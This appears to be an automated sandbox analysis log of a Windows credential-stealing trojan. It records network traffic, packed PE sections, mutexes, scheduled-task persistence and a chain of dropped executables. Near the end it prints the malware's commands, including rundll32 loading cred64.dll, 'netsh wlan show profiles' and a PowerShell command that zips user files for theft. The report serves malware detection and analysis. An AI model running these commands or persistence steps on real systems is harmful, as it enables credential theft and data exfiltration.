Source: bad48ea9ac.exe, 0000000F.00000003.2686052943.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2684405158.0000000003E1A000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000002.2690945819.0000000003E47000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2686241340.0000000003E46000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2683839052.0000000003E19000.00000004.00000020.00020000.00000000.sdmp, bad48ea9ac.exe, 0000000F.00000003.2687671932.0000000003E47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/accountt
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49821
Source: unknown Network traffic detected: HTTP traffic on port 49865 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 49890 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49820
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49783
Source: unknown Network traffic detected: HTTP traffic on port 49951 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49894 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49816
Source: unknown Network traffic detected: HTTP traffic on port 49845 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49815
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49868 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49881 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49899
Source: unknown Network traffic detected: HTTP traffic on port 49816 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49931
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49950 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49820 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49894
Source: unknown Network traffic detected: HTTP traffic on port 49929 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49890
Source: unknown Network traffic detected: HTTP traffic on port 49763 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49911 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49802 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49909 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49929
Source: unknown Network traffic detected: HTTP traffic on port 49882 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49804
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49802
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49845
Source: unknown Network traffic detected: HTTP traffic on port 49869 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49844
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49920
Source: unknown Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49783 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49763
Source: unknown Network traffic detected: HTTP traffic on port 49844 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49882
Source: unknown Network traffic detected: HTTP traffic on port 49678 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49821 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49881
Source: unknown Network traffic detected: HTTP traffic on port 49815 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49914 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49914
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49911
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49951
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49950
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49822 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49931 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49899 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49804 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49909
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown Network traffic detected: HTTP traffic on port 49920 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49869
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49868
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49822
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49802 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49804 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49844 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49845 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49865 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49868 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.126.28.20:443 -> 192.168.2.4:49916 version: TLS 1.2
Source: unknown HTTPS traffic detected: 34.117.186.192:443 -> 192.168.2.4:49929 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.26.5.15:443 -> 192.168.2.4:49931 version: TLS 1.2
Source: bad48ea9ac.exe, 0000000F.00000002.2689362746.0000000001593000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: _WINAPI_REGISTERRAWINPUTDEVICES memstr_ae6647e2-8

System Summary

Source: bad48ea9ac.exe, 0000000F.00000000.2408172800.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_c740df1c-c
Source: bad48ea9ac.exe, 0000000F.00000000.2408172800.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_ba9403ef-e
Source: bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: This is a third-party compiled AutoIt script. memstr_15eca3eb-4
Source: bad48ea9ac.exe, 0000001F.00000002.2814535383.00000000008C2000.00000002.00000001.01000000.00000010.sdmp String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer memstr_a9d75052-c
Source: UeW2b6mU6Z.exe Static PE information: section name:
Source: UeW2b6mU6Z.exe Static PE information: section name: .idata
Source: explorha.exe.0.dr Static PE information: section name:
Source: explorha.exe.0.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert[1].exe.6.dr Static PE information: section name: .idata
Source: amert[1].exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name:
Source: amert.exe.6.dr Static PE information: section name: .idata
Source: amert.exe.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name:
Source: random[1].exe0.6.dr Static PE information: section name: .idata
Source: random[1].exe0.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: 590971cd60.exe.6.dr Static PE information: section name: .idata
Source: 590971cd60.exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: sarra[1].exe.6.dr Static PE information: section name: .idata
Source: sarra[1].exe.6.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name:
Source: chrosha.exe.12.dr Static PE information: section name: .idata
Source: chrosha.exe.12.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: RageMP131.exe.20.dr Static PE information: section name: .idata
Source: RageMP131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: MPGPH131.exe.20.dr Static PE information: section name: .idata
Source: MPGPH131.exe.20.dr Static PE information: section name:
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AEE227 NtFlushProcessWriteBuffers,NtFlushProcessWriteBuffers, 6_2_00AEE227
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Windows\Tasks\explorha.job Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe File created: C:\Windows\Tasks\chrosha.job
Source: C:\Windows\System32\svchost.exe File created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C8A220 0_2_00C8A220
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C84330 0_2_00C84330
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C794E3 0_2_00C794E3
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C88DBB 0_2_00C88DBB
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C88EDB 0_2_00C88EDB
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C88669 0_2_00C88669
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C44E60 0_2_00C44E60
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: 0_2_00C847C8 0_2_00C847C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B1A220 1_2_00B1A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B14330 1_2_00B14330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B094E3 1_2_00B094E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B18DBB 1_2_00B18DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B18EDB 1_2_00B18EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00AD4E60 1_2_00AD4E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B18669 1_2_00B18669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 1_2_00B147C8 1_2_00B147C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B1A220 2_2_00B1A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B14330 2_2_00B14330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B094E3 2_2_00B094E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B18DBB 2_2_00B18DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B18EDB 2_2_00B18EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00AD4E60 2_2_00AD4E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B18669 2_2_00B18669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 2_2_00B147C8 2_2_00B147C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00ADDD40 6_2_00ADDD40
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B1A220 6_2_00B1A220
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B14330 6_2_00B14330
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF24A3 6_2_00AF24A3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B18669 6_2_00B18669
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B147C8 6_2_00B147C8
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF2C92 6_2_00AF2C92
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B18DBB 6_2_00B18DBB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B18EDB 6_2_00B18EDB
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AD4E60 6_2_00AD4E60
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF5481 6_2_00AF5481
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00B094E3 6_2_00B094E3
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: 6_2_00AF7822 6_2_00AF7822
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll 3C97BB410E49B11AF8116FEB7240B7101E1967CAE7538418C45C3D2E072E8103
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Code function: String function: 00C59750 appears 122 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00B0A433 appears 47 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEF620 appears 82 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEEFE2 appears 84 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AE9750 appears 367 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AE9090 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEECF8 appears 36 times
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Code function: String function: 00AEECE3 appears 75 times
Source: C:\Users\user\AppData\Local\Temp\1000056001\590971cd60.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5804 -s 2108
Source: UeW2b6mU6Z.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: UeW2b6mU6Z.exe Static PE information: Section: ZLIB complexity 0.9979945123994638
Source: explorha.exe.0.dr Static PE information: Section: ZLIB complexity 0.9979945123994638
Source: amert[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.9979554063360881
Source: amert[1].exe.6.dr Static PE information: Section: mxcnarui ZLIB complexity 0.9946192586994986
Source: amert.exe.6.dr Static PE information: Section: ZLIB complexity 0.9979554063360881
Source: amert.exe.6.dr Static PE information: Section: mxcnarui ZLIB complexity 0.9946192586994986
Source: random[1].exe0.6.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: 590971cd60.exe.6.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: sarra[1].exe.6.dr Static PE information: Section: ZLIB complexity 0.991563424556213
Source: chrosha.exe.12.dr Static PE information: Section: ZLIB complexity 0.9979554063360881
Source: chrosha.exe.12.dr Static PE information: Section: mxcnarui ZLIB complexity 0.9946192586994986
Source: RageMP131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: MPGPH131.exe.20.dr Static PE information: Section: ZLIB complexity 0.9915716795224007
Source: UeW2b6mU6Z.exe Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: explorha.exe.0.dr Static PE information: Entrypoint disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
Source: classification engine Classification label: mal100.phis.troj.spyw.evad.winEXE@108/150@20/15
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe File created: C:\Users\user\AppData\Roaming\a091ec0a6e2227 Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:512:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: NULL
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7324:120:WilError_03
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7484:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Mutant created: \Sessions\1\BaseNamedObjects\a091ec0a6e22276a96a99c1d34ef679c
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7828:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5804
Source: C:\Users\user\AppData\Local\Temp\4d0ab15804\chrosha.exe Mutant created: \Sessions\1\BaseNamedObjects\c1ec479e5342a25940592acf24703eb2
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6300:120:WilError_03
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4584
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File created: C:\Users\user\AppData\Local\Temp\09fd851a4f Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 590971cd60.exe, 00000014.00000003.2487222595.00000000053D0000.00000004.00001000.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2886812747.0000000000B81000.00000040.00000001.01000000.00000014.sdmp, MPGPH131.exe, 00000026.00000003.2553507559.0000000004FF0000.00000004.00001000.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000002.2747704687.0000000000631000.00000040.00000001.01000000.00000017.sdmp Binary or memory string: UPDATE %Q.%s SET sql = sqlite_rename_table(sql, %Q), tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');
Source: 590971cd60.exe, 00000014.00000003.2594923765.0000000007F59000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000002.2895094368.0000000007F60000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2597045577.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2598755903.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599973969.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2599301102.0000000007F57000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2630675144.0000000007F5C000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE autofill_edge_extended ( name VARCHAR, value VARCHAR, guid VARCHAR, source INTEGER NOT NULL DEFAULT 0, PRIMARY KEY (name, value))L DEFAULT 0, use_date INTEGER NOT NULL DEFAULT 0, date_modified INTEGER NOT NULL DEFAULT 0)ount INTEGER NOT NULL DEFAULT 0, use_date INTEGER NOT NULL DEFAULT 0)R DEFAULT 0, card_art_url VARCHAR)R DEFAULT 0, last_name_status INTEGER DEFAULT 0, first_last_name_status INTEGER DEFAULT 0, conjunction_last_name_status INTEGER DEFAULT 0, second_last_name_status INTEGER DEFAULT 0, full_name_status INTEGER DEFAULT 0, full_name_with_honorific_prefix VARCHAR, full_name_with_honorific_prefix_status INTEGER DEFAULT 0)0, zip_code_status INTEGER DEFAULT 0, sorting_code_status INTEGER DEFAULT 0, country_code_status INTEGER DEFAULT 0, apartment_number VARCHAR, floor VARCHAR, apartment_number_status INTEGER DEFAULT 0, floor_status INTEGER DEFAULT 0)c`~;
Source: rundll32.exe, 00000008.00000002.2527620455.0000022BD7150000.00000004.00000020.00020000.00000000.sdmp, 590971cd60.exe, 00000014.00000003.2582192926.0000000007F4D000.00000004.00000020.00020000.00000000.sdmp, MPGPH131.exe, 00000026.00000003.2722662732.0000000007CDD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: UeW2b6mU6Z.exe ReversingLabs: Detection: 39%
Source: UeW2b6mU6Z.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: explorha.exe String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe File read: C:\Users\user\Desktop\UeW2b6mU6Z.exe Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\UeW2b6mU6Z.exe "C:\Users\user\Desktop\UeW2b6mU6Z.exe"
Source: C:\Users\user\Desktop\UeW2b6mU6Z.exe Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe "C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe"
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: unknown Process created: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\netsh.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
Source: C:\Users\user\AppData\Local\Temp\09fd851a4f\explorha.exe Process created: C:\Users\user\AppData\Local\Temp\1000054001\amert.exe "C:\Users\user\AppData\Local\Temp\1000054001\amert.exe"
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Compress-Archive -Path 'C:\Users\user\AppData\Local\Temp\_Files_\' -DestinationPath 'C:\Users\user\AppData\Local\Temp\246122658369_Desktop.zip' -CompressionLevel Optimal
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
